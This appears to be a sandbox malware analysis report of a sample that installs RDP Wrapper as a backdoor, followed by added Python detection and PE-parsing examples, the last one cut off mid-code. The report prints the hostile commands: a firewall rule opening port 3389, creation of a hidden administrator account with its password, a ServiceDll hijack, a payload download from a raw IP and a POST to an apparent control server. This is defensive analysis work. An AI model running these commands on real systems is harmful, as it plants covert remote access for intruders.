
Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
Analysis ID: 1528587
MD5: 5057d16e9fb573fb3924b9c3dba53260
SHA1: ea177b2f35ca01d2e128bd876e56a548c3f69007
SHA256: 06e0a0da4cabec34eeb742c985b969260256aa15b50e14fddcc12eee7ac52fd2
Tags: exe

Detection

RDPWrap Tool
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: RDP Sensitive Settings Changed
Uses netsh to modify the Windows network and firewall settings
Yara detected RDPWrap Tool
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Spawns drivers
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe" MD5: 5057D16E9FB573FB3924B9C3DBA53260)
    • cmd.exe (PID: 6892 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 4464 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 6972 cmdline: "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6964 cmdline: net user RDPUser_217d5074 DUF6g)aA2aiB /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6980 cmdline: C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7088 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6892 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6972 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7032 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_217d5074 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6964 cmdline: net localgroup "Administrators" RDPUser_217d5074 /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7088 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • WerFault.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
No configs have been found
Yara Overview

Dropped Files
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Rule: JoeSecurity_RDPWrapTool; Description: Yara detected RDPWrap Tool; Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Rule: JoeSecurity_DelphiSystemParamCount; Description: Detected Delphi use of System.ParamCount(); Author: Joe Security

Memory Dumps
Source: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp; Rule: JoeSecurity_DelphiSystemParamCount; Description: Detected Delphi use of System.ParamCount(); Author: Joe Security
Source: 00000003.00000000.1688644177.0000000000401000.00000020.00000001.01000000.00000007.sdmp; Rule: JoeSecurity_DelphiSystemParamCount; Description: Detected Delphi use of System.ParamCount(); Author: Joe Security
Source: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp; Rule: JoeSecurity_RDPWrapTool; Description: Yara detected RDPWrap Tool; Author: Joe Security
Source: 00000003.00000000.1688700085.0000000000450000.00000002.00000001.01000000.00000007.sdmp; Rule: JoeSecurity_RDPWrapTool; Description: Yara detected RDPWrap Tool; Author: Joe Security
Source: Process Memory Space: RDPWInst.exe PID: 7052; Rule: JoeSecurity_RDPWrapTool; Description: Yara detected RDPWrap Tool; Author: Joe Security

Unpacked PEs
Source: 3.2.RDPWInst.exe.400000.0.unpack; Rule: JoeSecurity_RDPWrapTool; Description: Yara detected RDPWrap Tool; Author: Joe Security
Source: 3.2.RDPWInst.exe.400000.0.unpack; Rule: JoeSecurity_DelphiSystemParamCount; Description: Detected Delphi use of System.ParamCount(); Author: Joe Security
Source: 3.0.RDPWInst.exe.400000.0.unpack; Rule: JoeSecurity_RDPWrapTool; Description: Yara detected RDPWrap Tool; Author: Joe Security
Source: 3.0.RDPWInst.exe.400000.0.unpack; Rule: JoeSecurity_DelphiSystemParamCount; Description: Detected Delphi use of System.ParamCount(); Author: Joe Security

                        System Summary

Source: Registry Key set; Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali; Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 7052, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
Source: Process started; Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community); Data: Command: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, ProcessId: 6964, ProcessName: net.exe
Source: Process started; Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements); Data: Command: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, ProcessId: 6964, ProcessName: net.exe
                        No Suricata rule has matched
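The process tree and the Sigma hits above describe a four-step RDP backdoor: RDPWInst.exe -i installs RDP Wrapper, which repoints the TermService ServiceDll from termsrv.dll to rdpwrap.dll so the service accepts concurrent sessions on editions that normally refuse them; netsh opens TCP/3389 inbound on every profile; and net.exe creates RDPUser_217d5074 and adds it to Administrators. Each step on its own is something an administrator might do. What follows is an added example, not part of the Joe Sandbox report and not RDP Wrapper's own code: detection logic in Python run over Sysmon-style events constructed for this example and modelled on the report's process tree and registry hit (timestamps, the event shape and the svchost.exe control event are invented; PIDs and command lines are the page's). It flags each step and raises the verdict only when all four land within a short window.

```python
"""Added example (not part of the Joe Sandbox report or of RDP Wrapper):
flag the RDP-backdoor chain shown in the process tree and the Sigma hits,
over Sysmon-style events constructed for this example."""
import re
from datetime import datetime, timedelta

# Constructed events modelled on the report's process tree and its
# TermService\Parameters\ServiceDll registry hit. Timestamps and the
# svchost.exe control event are invented; PIDs and command lines are the page's.
SAMPLE_EVENTS = [
    {"ts": "2024-10-08T01:31:05", "kind": "ProcessCreate", "pid": 7052,
     "image": r"C:\Users\user\AppData\Local\Temp\RDPWInst.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i"},
    {"ts": "2024-10-08T01:31:06", "kind": "RegistrySetValue", "pid": 7052,
     "image": r"C:\Users\user\AppData\Local\Temp\RDPWInst.exe",
     "target": r"HKLM\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll",
     "details": r"%ProgramFiles%\RDP Wrapper\rdpwrap.dll"},
    {"ts": "2024-10-08T01:31:06", "kind": "ProcessCreate", "pid": 4464,
     "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" '
                'dir=in protocol=tcp localport=3389 profile=any action=allow'},
    {"ts": "2024-10-08T01:31:07", "kind": "ProcessCreate", "pid": 6964,
     "image": r"C:\Windows\SysWOW64\net.exe",
     "cmdline": "net user RDPUser_217d5074 DUF6g)aA2aiB /add"},
    {"ts": "2024-10-08T01:31:08", "kind": "ProcessCreate", "pid": 6892,
     "image": r"C:\Windows\SysWOW64\net.exe",
     "cmdline": "net localgroup"},                      # enumeration only: must not fire
    {"ts": "2024-10-08T01:31:09", "kind": "ProcessCreate", "pid": 6964,
     "image": r"C:\Windows\SysWOW64\net.exe",
     "cmdline": 'net localgroup "Administrators" RDPUser_217d5074 /add'},
    {"ts": "2024-10-08T01:31:09", "kind": "RegistrySetValue", "pid": 900,  # control: legitimate value
     "image": r"C:\Windows\System32\svchost.exe",
     "target": r"HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     "details": r"%SystemRoot%\System32\termsrv.dll"},
]

# net.exe hands the same arguments to net1.exe, so match both binaries.
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I)
NET_ADMIN_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+\"?administrators\"?\s+\S+\s+/add\b", re.I)
NETSH_RDP_ALLOW = re.compile(
    r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=3389\b.*\baction=allow\b", re.I)
TERMSRV_SERVICEDLL = re.compile(r"\\services\\termservice\\parameters\\servicedll$", re.I)

REQUIRED_STEPS = {"termservice_dll_hijack", "firewall_rdp_allow",
                  "local_user_add", "local_admin_add"}


def analyze(events):
    """Return one finding per (rule, pid); each finding keeps its evidence."""
    findings, seen = [], set()
    for ev in events:
        rule = None
        if ev["kind"] == "ProcessCreate":
            cl = ev["cmdline"]
            if NETSH_RDP_ALLOW.search(cl):
                rule = "firewall_rdp_allow"
            elif NET_ADMIN_ADD.search(cl):
                rule = "local_admin_add"
            elif NET_USER_ADD.search(cl):
                rule = "local_user_add"
        elif ev["kind"] == "RegistrySetValue" and TERMSRV_SERVICEDLL.search(ev["target"]):
            # The only legitimate ServiceDll for TermService is System32\termsrv.dll.
            value = ev["details"].lower().replace("/", "\\")
            if not value.endswith(r"\system32\termsrv.dll"):
                rule = "termservice_dll_hijack"
        if rule and (rule, ev["pid"]) not in seen:
            seen.add((rule, ev["pid"]))
            findings.append({"rule": rule, "pid": ev["pid"], "image": ev["image"],
                             "ts": datetime.fromisoformat(ev["ts"]),
                             "evidence": ev.get("cmdline") or ev["details"]})
    return findings


def verdict(findings, window=timedelta(minutes=5)):
    """Escalate only when every step of the chain occurs inside the window."""
    if not findings:
        return {"chain_complete": False, "steps_seen": [], "span_seconds": 0}
    times = sorted(f["ts"] for f in findings)
    steps = {f["rule"] for f in findings}
    span = times[-1] - times[0]
    return {"chain_complete": REQUIRED_STEPS <= steps and span <= window,
            "steps_seen": sorted(steps),
            "span_seconds": int(span.total_seconds())}


if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['ts']:%H:%M:%S} pid={h['pid']:<5} {h['rule']:<24} {h['evidence']}")
    print(verdict(hits))
```

On the sample events this yields four findings (the ServiceDll hijack, the firewall rule, the user creation and the group addition) spanning three seconds, so the chain verdict fires, while the bare `net localgroup` enumeration and the svchost.exe write of the legitimate termsrv.dll path stay silent. A caveat for production use: RDP Wrapper is an open-source tool that some administrators install deliberately, and AV verdicts on rdpwrap.dll alone say nothing about intent; what makes this sample a backdoor is the unattended install, the throwaway administrator account, and the reporting step visible in the Networking section below (a POST to /get_rdp.php right after the api.ipify.org lookup, whose 58-byte body the report does not show).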


                        AV Detection

Source: yalubluseks.eu; Virustotal: Detection: 12%
Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe; Virustotal: Detection: 22%
Source: http://147.45.44.104; Virustotal: Detection: 20%
Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeP; Virustotal: Detection: 19%
Source: http://yalubluseks.eu; Virustotal: Detection: 12%
Source: C:\Program Files\RDP Wrapper\rdpwrap.dll; ReversingLabs: Detection: 54%
Source: C:\Program Files\RDP Wrapper\rdpwrap.dll; Virustotal: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Virustotal: Detection: 77%
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe; ReversingLabs: Detection: 44%
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe; Virustotal: Detection: 58%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll
Source: unknown; HTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\symbols\exe\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb` source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3516600470.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: 00000000000000000400000000000000.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdbH source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbI source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.0000000001283000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.pdbt source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: C:\Users\Scarrled\Desktop\test\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: System.Core.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.pdb8 source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Code function: 3_2_004092D8 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Code function: 3_2_0040F73C FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Code function: 3_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW

                        Networking

Source: Yara match; File source: 3.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000000.1688700085.0000000000450000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RDPWInst.exe PID: 7052, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Tue, 08 Oct 2024 01:30:54 GMT; Content-Type: application/octet-stream; Content-Length: 1785344; Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT; Connection: keep-alive; Keep-Alive: timeout=120; ETag: "66f55533-1b3e00"; X-Content-Type-Options: nosniff; Accept-Ranges: bytes; Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: POST /get_rdp.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: yalubluseks.eu; Content-Length: 58; Expect: 100-continue; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1; Host: 147.45.44.104; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1; Host: api.ipify.org; Connection: Keep-Alive
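The 200 OK above carries a 1,785,344-byte application/octet-stream body whose first bytes are the MZ and PE headers of a 32-bit executable; that body becomes the RDPWInst.exe written to the user's Temp directory. As an added example, not part of the Joe Sandbox report, the Python below walks the captured bytes from the MZ header through e_lfanew to the COFF header and section table, reports the fields an analyst triages first (machine, link time, whether it is a DLL, section names and which are executable), and cross-checks the nginx ETag, which nginx builds as "<mtime hex>-<size hex>", against Last-Modified and Content-Length. The DOS header, the COFF header, the section names and their Characteristics are copied from the capture on this page; the optional header and the remaining section-table fields are zeroed placeholders, so the sizes and addresses in the output are not the real file's.

```python
"""Added example (not part of the Joe Sandbox report): confirm that the body of
the GET /prog/66f55533ca7d6_RDPWInst.exe response is a PE image, pull the
fields an analyst triages first, and cross-check the nginx ETag."""
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Response headers as captured (dict constructed here; the values are the page's).
RESPONSE_HEADERS = {
    "Content-Type": "application/octet-stream",
    "Content-Length": "1785344",
    "Last-Modified": "Thu, 26 Sep 2024 12:36:03 GMT",
    "ETag": '"66f55533-1b3e00"',
}

# Byte-exact from the capture: the 64-byte DOS header (e_lfanew = 0x100) and
# the PE signature plus the 20-byte COFF header.
DOS_HEADER = bytes.fromhex(
    "4d5a50000200000004000f00ffff0000"
    "b80000000000000040001a0000000000"
    + "00" * 28 + "00010000")
COFF = bytes.fromhex("504500004c01090023d6435a0000000000000000e0008e81")

# Section names and Characteristics as listed in the capture; every other
# section-table field and the whole optional header are zeroed placeholders.
SECTIONS = [(".text", 0x60000020), (".itext", 0x60000020), (".data", 0xC0000040),
            (".bss", 0xC0000000), (".idata", 0xC0000040), (".tls", 0xC0000000),
            (".rdata", 0x40000040), (".reloc", 0x42000040), (".rsrc", 0x40000040)]


def build_sample_body() -> bytes:
    """Assemble a body that starts exactly like the captured download."""
    dos = DOS_HEADER + b"This program must be run under Win32\r\n$"
    dos += b"\0" * (0x100 - len(dos))                      # pad up to e_lfanew
    opt = bytes.fromhex("0b010219") + b"\0" * (0xE0 - 4)   # PE32 magic, linker 2.25
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(SECTIONS))
    return dos + COFF + opt + table


def parse_pe_summary(body: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table."""
    if len(body) < 0x40 or body[:2] != b"MZ":
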